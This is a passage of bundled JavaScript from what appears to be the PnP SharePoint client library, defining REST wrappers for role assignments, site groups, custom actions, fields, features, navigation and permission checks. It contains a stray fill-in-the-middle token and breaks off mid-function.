baseUrl, path) || this; } /** * Adds a new role assignment with the specified principal and role definitions to the collection. * * @param principalId The ID of the user or group to assign permissions to * @param roleDefId The ID of the role definition that defines the permissions to assign * */ RoleAssignments.prototype.add = function (principalId, roleDefId) { return this.clone(RoleAssignments, "addroleassignment(principalid=" + principalId + ", roledefid=" + roleDefId + ")", true).post(); }; /** * Removes the role assignment with the specified principal and role definition from the collection * * @param principalId The ID of the user or group in the role assignment. * @param roleDefId The ID of the role definition in the role assignment * */ RoleAssignments.prototype.remove = function (principalId, roleDefId) { return this.clone(RoleAssignments, "removeroleassignment(principalid=" + principalId + ", roledefid=" + roleDefId + ")", true).post(); }; /** * Gets the role assignment associated with the specified principal ID from the collection. * * @param id The id of the role assignment */ RoleAssignments.prototype.getById = function (id) { var ra = new RoleAssignment(this); ra.concat("(" + id + ")"); return ra; }; return RoleAssignments; }(queryable_1.QueryableCollection)); exports.RoleAssignments = RoleAssignments; var RoleAssignment = (function (_super) { __extends(RoleAssignment, _super); function RoleAssignment() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(RoleAssignment.prototype, "groups", { get: function () { return new sitegroups_1.SiteGroups(this, "groups"); }, enumerable: true, configurable: true }); Object.defineProperty(RoleAssignment.prototype, "bindings", { /** * Get the role definition bindings for this role assignment * */ get: function () { return new RoleDefinitionBindings(this); }, enumerable: true, configurable: true }); /** * Delete this role assignment * */ RoleAssignment.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return RoleAssignment; }(queryable_1.QueryableInstance)); exports.RoleAssignment = RoleAssignment; var RoleDefinitions = (function (_super) { __extends(RoleDefinitions, _super); /** * Creates a new instance of the RoleDefinitions class * * @param baseUrl The url or Queryable which forms the parent of this fields collection * @param path * */ function RoleDefinitions(baseUrl, path) { if (path === void 0) { path = "roledefinitions"; } return _super.call(this, baseUrl, path) || this; } /** * Gets the role definition with the specified ID from the collection. * * @param id The ID of the role definition. * */ RoleDefinitions.prototype.getById = function (id) { return new RoleDefinition(this, "getById(" + id + ")"); }; /** * Gets the role definition with the specified name. * * @param name The name of the role definition. * */ RoleDefinitions.prototype.getByName = function (name) { return new RoleDefinition(this, "getbyname('" + name + "')"); }; /** * Gets the role definition with the specified type. * * @param name The name of the role definition. * */ RoleDefinitions.prototype.getByType = function (roleTypeKind) { return new RoleDefinition(this, "getbytype(" + roleTypeKind + ")"); }; /** * Create a role definition * * @param name The new role definition's name * @param description The new role definition's description * @param order The order in which the role definition appears * @param basePermissions The permissions mask for this role definition * */ RoleDefinitions.prototype.add = function (name, description, order, basePermissions) { var _this = this; var postBody = JSON.stringify({ BasePermissions: util_1.Util.extend({ __metadata: { type: "SP.BasePermissions" } }, basePermissions), Description: description, Name: name, Order: order, __metadata: { "type": "SP.RoleDefinition" }, }); return this.post({ body: postBody }).then(function (data) { return { data: data, definition: _this.getById(data.Id), }; }); }; return RoleDefinitions; }(queryable_1.QueryableCollection)); exports.RoleDefinitions = RoleDefinitions; var RoleDefinition = (function (_super) { __extends(RoleDefinition, _super); function RoleDefinition() { return _super !== null && _super.apply(this, arguments) || this; } /** * Updates this web intance with the supplied properties * * @param properties A plain object hash of values to update for the web */ /* tslint:disable no-string-literal */ RoleDefinition.prototype.update = function (properties) { var _this = this; if (typeof properties.hasOwnProperty("BasePermissions") !== "undefined") { properties["BasePermissions"] = util_1.Util.extend({ __metadata: { type: "SP.BasePermissions" } }, properties["BasePermissions"]); } var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.RoleDefinition" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { var retDef = _this; if (properties.hasOwnProperty("Name")) { var parent_1 = _this.getParent(RoleDefinitions, _this.parentUrl, ""); retDef = parent_1.getByName(properties["Name"]); } return { data: data, definition: retDef, }; }); }; /* tslint:enable */ /** * Delete this role definition * */ RoleDefinition.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return RoleDefinition; }(queryable_1.QueryableInstance)); exports.RoleDefinition = RoleDefinition; var RoleDefinitionBindings = (function (_super) { __extends(RoleDefinitionBindings, _super); function RoleDefinitionBindings(baseUrl, path) { if (path === void 0) { path = "roledefinitionbindings"; } return _super.call(this, baseUrl, path) || this; } return RoleDefinitionBindings; }(queryable_1.QueryableCollection)); exports.RoleDefinitionBindings = RoleDefinitionBindings; /***/ }), /* 18 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var siteusers_1 = __webpack_require__(30); var util_1 = __webpack_require__(0); /** * Principal Type enum * */ var PrincipalType; (function (PrincipalType) { PrincipalType[PrincipalType["None"] = 0] = "None"; PrincipalType[PrincipalType["User"] = 1] = "User"; PrincipalType[PrincipalType["DistributionList"] = 2] = "DistributionList"; PrincipalType[PrincipalType["SecurityGroup"] = 4] = "SecurityGroup"; PrincipalType[PrincipalType["SharePointGroup"] = 8] = "SharePointGroup"; PrincipalType[PrincipalType["All"] = 15] = "All"; })(PrincipalType = exports.PrincipalType || (exports.PrincipalType = {})); /** * Describes a collection of site groups * */ var SiteGroups = (function (_super) { __extends(SiteGroups, _super); /** * Creates a new instance of the SiteGroups class * * @param baseUrl The url or Queryable which forms the parent of this group collection */ function SiteGroups(baseUrl, path) { if (path === void 0) { path = "sitegroups"; } return _super.call(this, baseUrl, path) || this; } /** * Adds a new group to the site collection * * @param props The group properties object of property names and values to be set for the group */ SiteGroups.prototype.add = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.Group" } }, properties)); return this.post({ body: postBody }).then(function (data) { return { data: data, group: _this.getById(data.Id), }; }); }; /** * Gets a group from the collection by name * * @param groupName The name of the group to retrieve */ SiteGroups.prototype.getByName = function (groupName) { return new SiteGroup(this, "getByName('" + groupName + "')"); }; /** * Gets a group from the collection by id * * @param id The id of the group to retrieve */ SiteGroups.prototype.getById = function (id) { var sg = new SiteGroup(this); sg.concat("(" + id + ")"); return sg; }; /** * Removes the group with the specified member id from the collection * * @param id The id of the group to remove */ SiteGroups.prototype.removeById = function (id) { return this.clone(SiteGroups, "removeById('" + id + "')", true).post(); };<|fim▁hole|> * * @param loginName The name of the group to remove */ SiteGroups.prototype.removeByLoginName = function (loginName) { return this.clone(SiteGroups, "removeByLoginName('" + loginName + "')", true).post(); }; return SiteGroups; }(queryable_1.QueryableCollection)); exports.SiteGroups = SiteGroups; /** * Describes a single group * */ var SiteGroup = (function (_super) { __extends(SiteGroup, _super); function SiteGroup() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(SiteGroup.prototype, "users", { /** * Gets the users for this group * */ get: function () { return new siteusers_1.SiteUsers(this, "users"); }, enumerable: true, configurable: true }); /** * Updates this group instance with the supplied properties * * @param properties A GroupWriteableProperties object of property names and values to update for the group */ /* tslint:disable no-string-literal */ SiteGroup.prototype.update = function (properties) { var _this = this; var postBody = util_1.Util.extend({ "__metadata": { "type": "SP.Group" } }, properties); return this.post({ body: JSON.stringify(postBody), headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { var retGroup = _this; if (properties.hasOwnProperty("Title")) { retGroup = _this.getParent(SiteGroup, _this.parentUrl, "getByName('" + properties["Title"] + "')"); } return { data: data, group: retGroup, }; }); }; return SiteGroup; }(queryable_1.QueryableInstance)); exports.SiteGroup = SiteGroup; /***/ }), /* 19 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); /** * Describes a collection of user custom actions * */ var UserCustomActions = (function (_super) { __extends(UserCustomActions, _super); /** * Creates a new instance of the UserCustomActions class * * @param baseUrl The url or Queryable which forms the parent of this user custom actions collection */ function UserCustomActions(baseUrl, path) { if (path === void 0) { path = "usercustomactions"; } return _super.call(this, baseUrl, path) || this; } /** * Returns the user custom action with the specified id * * @param id The GUID id of the user custom action to retrieve */ UserCustomActions.prototype.getById = function (id) { var uca = new UserCustomAction(this); uca.concat("('" + id + "')"); return uca; }; /** * Creates a user custom action * * @param properties The information object of property names and values which define the new user custom action * */ UserCustomActions.prototype.add = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ __metadata: { "type": "SP.UserCustomAction" } }, properties)); return this.post({ body: postBody }).then(function (data) { return { action: _this.getById(data.Id), data: data, }; }); }; /** * Deletes all user custom actions in the collection * */ UserCustomActions.prototype.clear = function () { return this.clone(UserCustomActions, "clear", true).post(); }; return UserCustomActions; }(queryable_1.QueryableCollection)); exports.UserCustomActions = UserCustomActions; /** * Describes a single user custom action * */ var UserCustomAction = (function (_super) { __extends(UserCustomAction, _super); function UserCustomAction() { return _super !== null && _super.apply(this, arguments) || this; } /** * Updates this user custom action with the supplied properties * * @param properties An information object of property names and values to update for this user custom action */ UserCustomAction.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.UserCustomAction" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { action: _this, data: data, }; }); }; /** * Removes this user custom action * */ UserCustomAction.prototype.delete = function () { return _super.prototype.delete.call(this); }; return UserCustomAction; }(queryable_1.QueryableInstance)); exports.UserCustomAction = UserCustomAction; /***/ }), /* 20 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var storage = __webpack_require__(14); var exceptions_1 = __webpack_require__(3); /** * A caching provider which can wrap other non-caching providers * */ var CachingConfigurationProvider = (function () { /** * Creates a new caching configuration provider * @constructor * @param {IConfigurationProvider} wrappedProvider Provider which will be used to fetch the configuration * @param {string} cacheKey Key that will be used to store cached items to the cache * @param {IPnPClientStore} cacheStore OPTIONAL storage, which will be used to store cached settings. */ function CachingConfigurationProvider(wrappedProvider, cacheKey, cacheStore) { this.wrappedProvider = wrappedProvider; this.store = (cacheStore) ? cacheStore : this.selectPnPCache(); this.cacheKey = "_configcache_" + cacheKey; } /** * Gets the wrapped configuration providers * * @return {IConfigurationProvider} Wrapped configuration provider */ CachingConfigurationProvider.prototype.getWrappedProvider = function () { return this.wrappedProvider; }; /** * Loads the configuration values either from the cache or from the wrapped provider * * @return {Promise<TypedHash<string>>} Promise of loaded configuration values */ CachingConfigurationProvider.prototype.getConfiguration = function () { var _this = this; // Cache not available, pass control to the wrapped provider if ((!this.store) || (!this.store.enabled)) { return this.wrappedProvider.getConfiguration(); } // Value is found in cache, return it directly var cachedConfig = this.store.get(this.cacheKey); if (cachedConfig) { return new Promise(function (resolve) { resolve(cachedConfig); }); } // Get and cache value from the wrapped provider var providerPromise = this.wrappedProvider.getConfiguration(); providerPromise.then(function (providedConfig) { _this.store.put(_this.cacheKey, providedConfig); }); return providerPromise; }; CachingConfigurationProvider.prototype.selectPnPCache = function () { var pnpCache = new storage.PnPClientStorage(); if ((pnpCache.local) && (pnpCache.local.enabled)) { return pnpCache.local; } if ((pnpCache.session) && (pnpCache.session.enabled)) { return pnpCache.session; } throw new exceptions_1.NoCacheAvailableException(); }; return CachingConfigurationProvider; }()); exports.default = CachingConfigurationProvider; /***/ }), /* 21 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; /* WEBPACK VAR INJECTION */(function(global) { Object.defineProperty(exports, "__esModule", { value: true }); /** * Makes requests using the fetch API */ var FetchClient = (function () { function FetchClient() { } FetchClient.prototype.fetch = function (url, options) { return global.fetch(url, options); }; return FetchClient; }()); exports.FetchClient = FetchClient; /* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(32))) /***/ }), /* 22 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var storage_1 = __webpack_require__(14); var util_1 = __webpack_require__(0); var pnplibconfig_1 = __webpack_require__(4); var CachingOptions = (function () { function CachingOptions(key) { this.key = key; this.expiration = util_1.Util.dateAdd(new Date(), "second", pnplibconfig_1.RuntimeConfig.defaultCachingTimeoutSeconds); this.storeName = pnplibconfig_1.RuntimeConfig.defaultCachingStore; } Object.defineProperty(CachingOptions.prototype, "store", { get: function () { if (this.storeName === "local") { return CachingOptions.storage.local; } else { return CachingOptions.storage.session; } }, enumerable: true, configurable: true }); return CachingOptions; }()); CachingOptions.storage = new storage_1.PnPClientStorage(); exports.CachingOptions = CachingOptions; var CachingParserWrapper = (function () { function CachingParserWrapper(_parser, _cacheOptions) { this._parser = _parser; this._cacheOptions = _cacheOptions; } CachingParserWrapper.prototype.parse = function (response) { var _this = this; // add this to the cache based on the options return this._parser.parse(response).then(function (data) { if (_this._cacheOptions.store !== null) { _this._cacheOptions.store.put(_this._cacheOptions.key, data, _this._cacheOptions.expiration); } return data; }); }; return CachingParserWrapper; }()); exports.CachingParserWrapper = CachingParserWrapper; /***/ }), /* 23 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); /** * Describes a collection of List objects * */ var Features = (function (_super) { __extends(Features, _super); /** * Creates a new instance of the Lists class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Features(baseUrl, path) { if (path === void 0) { path = "features"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a list from the collection by guid id * * @param id The Id of the feature (GUID) */ Features.prototype.getById = function (id) { var feature = new Feature(this); feature.concat("('" + id + "')"); return feature; }; /** * Adds a new list to the collection * * @param id The Id of the feature (GUID) * @param force If true the feature activation will be forced */ Features.prototype.add = function (id, force) { var _this = this; if (force === void 0) { force = false; } return this.clone(Features, "add", true).post({ body: JSON.stringify({ featdefScope: 0, featureId: id, force: force, }), }).then(function (data) { return { data: data, feature: _this.getById(id), }; }); }; /** * Removes (deactivates) a feature from the collection * * @param id The Id of the feature (GUID) * @param force If true the feature deactivation will be forced */ Features.prototype.remove = function (id, force) { if (force === void 0) { force = false; } return this.clone(Features, "remove", true).post({ body: JSON.stringify({ featureId: id, force: force, }), }); }; return Features; }(queryable_1.QueryableCollection)); exports.Features = Features; var Feature = (function (_super) { __extends(Feature, _super); function Feature() { return _super !== null && _super.apply(this, arguments) || this; } /** * Removes (deactivates) a feature from the collection * * @param force If true the feature deactivation will be forced */ Feature.prototype.deactivate = function (force) { var _this = this; if (force === void 0) { force = false; } var removeDependency = this.addBatchDependency(); var idGet = new Feature(this).select("DefinitionId"); return idGet.getAs().then(function (feature) { var promise = _this.getParent(Features, _this.parentUrl, "", _this.batch).remove(feature.DefinitionId, force); removeDependency(); return promise; }); }; return Feature; }(queryable_1.QueryableInstance)); exports.Feature = Feature; /***/ }), /* 24 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var util_1 = __webpack_require__(0); var types_1 = __webpack_require__(13); /** * Describes a collection of Field objects * */ var Fields = (function (_super) { __extends(Fields, _super); /** * Creates a new instance of the Fields class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Fields(baseUrl, path) { if (path === void 0) { path = "fields"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a field from the collection by title * * @param title The case-sensitive title of the field */ Fields.prototype.getByTitle = function (title) { return new Field(this, "getByTitle('" + title + "')"); }; /** * Gets a field from the collection by using internal name or title * * @param name The case-sensitive internal name or title of the field */ Fields.prototype.getByInternalNameOrTitle = function (name) { return new Field(this, "getByInternalNameOrTitle('" + name + "')"); }; /** * Gets a list from the collection by guid id * * @param title The Id of the list */ Fields.prototype.getById = function (id) { var f = new Field(this); f.concat("('" + id + "')"); return f; }; /** * Creates a field based on the specified schema */ Fields.prototype.createFieldAsXml = function (xml) { var _this = this; var info; if (typeof xml === "string") { info = { SchemaXml: xml }; } else { info = xml; } var postBody = JSON.stringify({ "parameters": util_1.Util.extend({ "__metadata": { "type": "SP.XmlSchemaFieldCreationInformation", }, }, info), }); return this.clone(Fields, "createfieldasxml", true).postAs({ body: postBody }).then(function (data) { return { data: data, field: _this.getById(data.Id), }; }); }; /** * Adds a new list to the collection * * @param title The new field's title * @param fieldType The new field's type (ex: SP.FieldText) * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.add = function (title, fieldType, properties) { var _this = this; if (properties === void 0) { properties = {}; } var postBody = JSON.stringify(util_1.Util.extend({ "Title": title, "__metadata": { "type": fieldType }, }, properties)); return this.clone(Fields, null, true).postAs({ body: postBody }).then(function (data) { return { data: data, field: _this.getById(data.Id), }; }); }; /** * Adds a new SP.FieldText to the collection * * @param title The field title * @param maxLength The maximum number of characters allowed in the value of the field. * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addText = function (title, maxLength, properties) { if (maxLength === void 0) { maxLength = 255; } var props = { FieldTypeKind: 2, MaxLength: maxLength, }; return this.add(title, "SP.FieldText", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldCalculated to the collection * * @param title The field title. * @param formula The formula for the field. * @param dateFormat The date and time format that is displayed in the field. * @param outputType Specifies the output format for the field. Represents a FieldType value. * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addCalculated = function (title, formula, dateFormat, outputType, properties) { if (outputType === void 0) { outputType = types_1.FieldTypes.Text; } var props = { DateFormat: dateFormat, FieldTypeKind: 17, Formula: formula, OutputType: outputType, }; return this.add(title, "SP.FieldCalculated", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldDateTime to the collection * * @param title The field title * @param displayFormat The format of the date and time that is displayed in the field. * @param calendarType Specifies the calendar type of the field. * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addDateTime = function (title, displayFormat, calendarType, friendlyDisplayFormat, properties) { if (displayFormat === void 0) { displayFormat = types_1.DateTimeFieldFormatType.DateOnly; } if (calendarType === void 0) { calendarType = types_1.CalendarType.Gregorian; } if (friendlyDisplayFormat === void 0) { friendlyDisplayFormat = 0; } var props = { DateTimeCalendarType: calendarType, DisplayFormat: displayFormat, FieldTypeKind: 4, FriendlyDisplayFormat: friendlyDisplayFormat, }; return this.add(title, "SP.FieldDateTime", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldNumber to the collection * * @param title The field title * @param minValue The field's minimum value * @param maxValue The field's maximum value * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addNumber = function (title, minValue, maxValue, properties) { var props = { FieldTypeKind: 9 }; if (typeof minValue !== "undefined") { props = util_1.Util.extend({ MinimumValue: minValue }, props); } if (typeof maxValue !== "undefined") { props = util_1.Util.extend({ MaximumValue: maxValue }, props); } return this.add(title, "SP.FieldNumber", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldCurrency to the collection * * @param title The field title * @param minValue The field's minimum value * @param maxValue The field's maximum value * @param currencyLocalId Specifies the language code identifier (LCID) used to format the value of the field * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) */ Fields.prototype.addCurrency = function (title, minValue, maxValue, currencyLocalId, properties) { if (currencyLocalId === void 0) { currencyLocalId = 1033; } var props = { CurrencyLocaleId: currencyLocalId, FieldTypeKind: 10, }; if (typeof minValue !== "undefined") { props = util_1.Util.extend({ MinimumValue: minValue }, props); } if (typeof maxValue !== "undefined") { props = util_1.Util.extend({ MaximumValue: maxValue }, props); } return this.add(title, "SP.FieldCurrency", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldMultiLineText to the collection * * @param title The field title * @param numberOfLines Specifies the number of lines of text to display for the field. * @param richText Specifies whether the field supports rich formatting. * @param restrictedMode Specifies whether the field supports a subset of rich formatting. * @param appendOnly Specifies whether all changes to the value of the field are displayed in list forms. * @param allowHyperlink Specifies whether a hyperlink is allowed as a value of the field. * @param properties Differ by type of field being created (see: https://msdn.microsoft.com/en-us/library/office/dn600182.aspx) * */ Fields.prototype.addMultilineText = function (title, numberOfLines, richText, restrictedMode, appendOnly, allowHyperlink, properties) { if (numberOfLines === void 0) { numberOfLines = 6; } if (richText === void 0) { richText = true; } if (restrictedMode === void 0) { restrictedMode = false; } if (appendOnly === void 0) { appendOnly = false; } if (allowHyperlink === void 0) { allowHyperlink = true; } var props = { AllowHyperlink: allowHyperlink, AppendOnly: appendOnly, FieldTypeKind: 3, NumberOfLines: numberOfLines, RestrictedMode: restrictedMode, RichText: richText, }; return this.add(title, "SP.FieldMultiLineText", util_1.Util.extend(props, properties)); }; /** * Adds a new SP.FieldUrl to the collection * * @param title The field title */ Fields.prototype.addUrl = function (title, displayFormat, properties) { if (displayFormat === void 0) { displayFormat = types_1.UrlFieldFormatType.Hyperlink; } var props = { DisplayFormat: displayFormat, FieldTypeKind: 11, }; return this.add(title, "SP.FieldUrl", util_1.Util.extend(props, properties)); }; return Fields; }(queryable_1.QueryableCollection)); exports.Fields = Fields; /** * Describes a single of Field instance * */ var Field = (function (_super) { __extends(Field, _super); function Field() { return _super !== null && _super.apply(this, arguments) || this; } /** * Updates this field intance with the supplied properties * * @param properties A plain object hash of values to update for the list * @param fieldType The type value, required to update child field type properties */ Field.prototype.update = function (properties, fieldType) { var _this = this; if (fieldType === void 0) { fieldType = "SP.Field"; } var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": fieldType }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, field: _this, }; }); }; /** * Delete this fields * */ Field.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; /** * Sets the value of the ShowInDisplayForm property for this field. */ Field.prototype.setShowInDisplayForm = function (show) { return this.clone(Field, "setshowindisplayform(" + show + ")", true).post(); }; /** * Sets the value of the ShowInEditForm property for this field. */ Field.prototype.setShowInEditForm = function (show) { return this.clone(Field, "setshowineditform(" + show + ")", true).post(); }; /** * Sets the value of the ShowInNewForm property for this field. */ Field.prototype.setShowInNewForm = function (show) { return this.clone(Field, "setshowinnewform(" + show + ")", true).post(); }; return Field; }(queryable_1.QueryableInstance)); exports.Field = Field; /***/ }), /* 25 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var queryable_1 = __webpack_require__(1); /** * Represents a collection of navigation nodes * */ var NavigationNodes = (function (_super) { __extends(NavigationNodes, _super); function NavigationNodes() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a navigation node by id * * @param id The id of the node */ NavigationNodes.prototype.getById = function (id) { var node = new NavigationNode(this); node.concat("(" + id + ")"); return node; }; /** * Adds a new node to the collection * * @param title Display name of the node * @param url The url of the node * @param visible If true the node is visible, otherwise it is hidden (default: true) */ NavigationNodes.prototype.add = function (title, url, visible) { var _this = this; if (visible === void 0) { visible = true; } var postBody = JSON.stringify({ IsVisible: visible, Title: title, Url: url, "__metadata": { "type": "SP.NavigationNode" }, }); return this.clone(NavigationNodes, null, true).post({ body: postBody }).then(function (data) { return { data: data, node: _this.getById(data.Id), }; }); }; /** * Moves a node to be after another node in the navigation * * @param nodeId Id of the node to move * @param previousNodeId Id of the node after which we move the node specified by nodeId */ NavigationNodes.prototype.moveAfter = function (nodeId, previousNodeId) { var postBody = JSON.stringify({ nodeId: nodeId, previousNodeId: previousNodeId, }); return this.clone(NavigationNodes, "MoveAfter", true).post({ body: postBody }); }; return NavigationNodes; }(queryable_1.QueryableCollection)); exports.NavigationNodes = NavigationNodes; var NavigationNode = (function (_super) { __extends(NavigationNode, _super); function NavigationNode() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(NavigationNode.prototype, "children", { /** * Represents the child nodes of this node */ get: function () { return new NavigationNodes(this, "Children"); }, enumerable: true, configurable: true }); /** * Updates this node based on the supplied properties * * @param properties The hash of key/value pairs to update */ NavigationNode.prototype.update = function (properties) { var _this = this; var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.NavigationNode" }, }, properties)); return this.post({ body: postBody, headers: { "X-HTTP-Method": "MERGE", }, }).then(function (data) { return { data: data, node: _this, }; }); }; /** * Deletes this node and any child nodes */ NavigationNode.prototype.delete = function () { return _super.prototype.delete.call(this); }; return NavigationNode; }(queryable_1.QueryableInstance)); exports.NavigationNode = NavigationNode; /** * Exposes the navigation components * */ var Navigation = (function (_super) { __extends(Navigation, _super); /** * Creates a new instance of the Lists class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Navigation(baseUrl, path) { if (path === void 0) { path = "navigation"; } return _super.call(this, baseUrl, path) || this; } Object.defineProperty(Navigation.prototype, "quicklaunch", { /** * Gets the quicklaunch navigation for the current context * */ get: function () { return new NavigationNodes(this, "quicklaunch"); }, enumerable: true, configurable: true }); Object.defineProperty(Navigation.prototype, "topNavigationBar", { /** * Gets the top bar navigation navigation for the current context * */ get: function () { return new NavigationNodes(this, "topnavigationbar"); }, enumerable: true, configurable: true }); return Navigation; }(queryable_1.Queryable)); exports.Navigation = Navigation; /***/ }), /* 26 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var webs_1 = __webpack_require__(8); var roles_1 = __webpack_require__(17); var types_1 = __webpack_require__(13); var queryable_1 = __webpack_require__(1); var QueryableSecurable = (function (_super) { __extends(QueryableSecurable, _super); function QueryableSecurable() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(QueryableSecurable.prototype, "roleAssignments", { /** * Gets the set of role assignments for this item * */ get: function () { return new roles_1.RoleAssignments(this); }, enumerable: true, configurable: true }); Object.defineProperty(QueryableSecurable.prototype, "firstUniqueAncestorSecurableObject", { /** * Gets the closest securable up the security hierarchy whose permissions are applied to this list item * */ get: function () { return new queryable_1.QueryableInstance(this, "FirstUniqueAncestorSecurableObject"); }, enumerable: true, configurable: true }); /** * Gets the effective permissions for the user supplied * * @param loginName The claims username for the user (ex: i:0#.f|membership|[email protected]) */ QueryableSecurable.prototype.getUserEffectivePermissions = function (loginName) { var q = this.clone(queryable_1.Queryable, "getUserEffectivePermissions(@user)", true); q.query.add("@user", "'" + encodeURIComponent(loginName) + "'"); return q.getAs(); }; /** * Gets the effective permissions for the current user */ QueryableSecurable.prototype.getCurrentUserEffectivePermissions = function () { var _this = this; var w = webs_1.Web.fromUrl(this.toUrl()); return w.currentUser.select("LoginName").getAs().then(function (user) { return _this.getUserEffectivePermissions(user.LoginName); }); }; /** * Breaks the security inheritance at this level optinally copying permissions and clearing subscopes * * @param copyRoleAssignments If true the permissions are copied from the current parent scope * @param clearSubscopes Optional. true to make all child securable objects inherit role assignments from the current object */ QueryableSecurable.prototype.breakRoleInheritance = function (copyRoleAssignments, clearSubscopes) { if (copyRoleAssignments === void 0) { copyRoleAssignments = false; } if (clearSubscopes === void 0) { clearSubscopes = false; } return this.clone(QueryableSecurable, "breakroleinheritance(copyroleassignments=" + copyRoleAssignments + ", clearsubscopes=" + clearSubscopes + ")", true).post(); }; /** * Removes the local role assignments so that it re-inherit role assignments from the parent object. * */ QueryableSecurable.prototype.resetRoleInheritance = function () { return this.clone(QueryableSecurable, "resetroleinheritance", true).post(); }; /** * Determines if a given user has the appropriate permissions * * @param loginName The user to check * @param permission The permission being checked */ QueryableSecurable.prototype.userHasPermissions = function (loginName, permission) { var _this = 